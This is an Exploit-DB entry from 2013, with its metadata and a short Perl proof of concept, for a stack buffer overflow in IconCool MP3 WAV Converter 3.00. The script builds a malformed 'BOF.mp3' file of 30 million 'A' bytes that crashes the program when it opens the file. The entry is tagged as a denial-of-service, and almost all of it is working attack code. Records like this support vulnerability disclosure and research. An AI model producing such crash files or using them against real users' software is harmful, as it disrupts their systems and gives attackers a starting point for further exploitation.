IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow
Author: G0li47h
type: dos
platform: windows
port:
date_added: 2013-03-25
date_updated: 2013-03-25
verified: 1
codes: OSVDB-92503
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-25-at-82931-am.png
application_url: http://www.exploit-db.cominsticoncoolmp3wavconverter.exe
# Exploit Title: IconCool MP3 WAV Converter Stack Buffer Overflow Vulnerability
# Date: 3/24/2013
# Exploit Author: G0li47h
# Vendor Homepage: http://www.iconcool.com
# Software Link: http://www.iconcool.com/insticoncoolmp3wavconverter.exe
# Version: v3.00 Build 120518
# Tested on: Windows 7 SP1
my $file= "BOF.mp3";
my $FILE;
my $junk = "\x41" x 30000000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";